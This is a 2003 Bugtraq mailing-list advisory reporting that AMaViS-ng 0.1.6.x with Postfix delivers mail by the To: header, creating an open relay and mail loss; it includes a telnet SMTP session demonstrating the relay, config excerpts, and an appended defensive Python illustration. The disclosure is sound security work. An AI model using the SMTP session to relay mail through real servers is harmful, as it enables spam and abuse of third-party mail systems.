Bugtraq mailing list archives
AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss
From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1 () protected unixadm org>
Date: Mon, 7 Apr 2003 14:23:47 +0200
Hi everyone - with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is not vulnerable), all email gets forwarded to the address specified by the "To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:

--%snip%--
    #> telnet somemx.domain.tld 25
    (220 somemx.domain.tld ESMTP Postfix)
    helo amavis-ng
    (250 somemx.domain.tld)
    mail from:userX () domainX tld
    (250 ok)
    rcpt to:userY () domain tld
    (250 ok)
    data
    (354 End data with <CR><LF>.<CR><LF>)
    From: userX () domainX tld
    To: userZ () domainZ tld
    Subject: AMaViS-ng 0.1.6.x bug
    .
    (250 Ok: queued as ...)
    quit
    (221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x installed must accept emails for userY () domain tld.

What it does: userX () domainX tld is sending an email to userY () domain tld. The header of this email contains "To: userZ () domain tld". AMaViS-ng seems to parse the header and forwards the email to userZ () domain tld. userY () domain tld does not get this email.

As many postfix users trust their localhost (no restrictions for localhost), it is possible to relay an email or a spam mail this way.

Configuration files (relevant parts):

    # $postfix/master.cf
    smtp      inet  n       -       n       -       -       smtpd
        -o content_filter=filter:
    filter    unix  -       n       n       -       -       pipe
        flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
    # end of master.cf

    # $amavis-ng/amavis.conf
    [global]
    mail-transfer-agent = Postfix
    [Postfix]
    postfix = /usr/sbin/sendmail
    args = -i -f
    # end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,
Phil Cyc
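The core of the report is a content filter that re-injects mail to the addresses in the To: header instead of the envelope recipients Postfix hands it on the pipe(8) command line. The following is an added illustration, not AMaViS-ng or Postfix code: a simulated filter that takes its recipients only from the `${sender} -- ${recipient}` argv shown in master.cf, next to a helper that shows what a header-trusting filter would have delivered to, and a mismatch check an operator could use to spot such re-routing in filter logs. The message and addresses are constructed to mirror the report (domain names and the `--` argument separator are assumptions).

```python
"""Simulated Postfix pipe(8) content filter: envelope vs. header recipients.
Constructed illustration; not code from AMaViS-ng or Postfix."""
import email
from email.policy import default

# Constructed message mirroring the report: the envelope RCPT TO names
# userY, but the To: header names userZ.
SAMPLE_MESSAGE = b"""From: userX@domainX.tld
To: userZ@domainZ.tld
Subject: AMaViS-ng 0.1.6.x bug

test body
"""


def parse_pipe_argv(argv):
    """Split the 'sender -- recipient...' list that master.cf passes via
    argv=... ${sender} -- ${recipient}. Recipients come only from here."""
    if "--" not in argv:
        raise ValueError("expected 'sender -- recipient...'")
    sep = argv.index("--")
    sender = argv[0] if sep >= 1 else ""
    recipients = argv[sep + 1:]
    if not recipients:
        raise ValueError("no envelope recipients on the command line")
    return sender, recipients


def header_recipients(raw):
    """Where a filter that trusts To:/Cc: headers would deliver (the
    behaviour the report describes). Shown for comparison only."""
    msg = email.message_from_bytes(raw, policy=default)
    out = []
    for field in ("To", "Cc"):
        hdr = msg[field]
        if hdr is not None:
            out.extend(a.addr_spec for a in hdr.addresses)
    return out


def reinjection_command(sendmail, sender, recipients):
    """Build the argv for handing the scanned message back to Postfix.
    '--' keeps a recipient that starts with '-' from being read as an option."""
    return [sendmail, "-i", "-f", sender, "--"] + list(recipients)


def envelope_header_mismatch(argv, raw):
    """Header addresses the envelope never named: a logging/detection aid for
    catching a filter that re-routes mail by header (mismatch is not itself
    an error; Bcc and mailing lists produce it legitimately)."""
    _, env = parse_pipe_argv(argv)
    env_set = {e.lower() for e in env}
    return [r for r in header_recipients(raw) if r.lower() not in env_set]
```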
Current thread:
- AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Phil Cyc (Apr 08)
- Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Phil Cyc (Apr 09)
- <Possible follow-ups>
- Re: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss Hilko Bengen (Apr 12)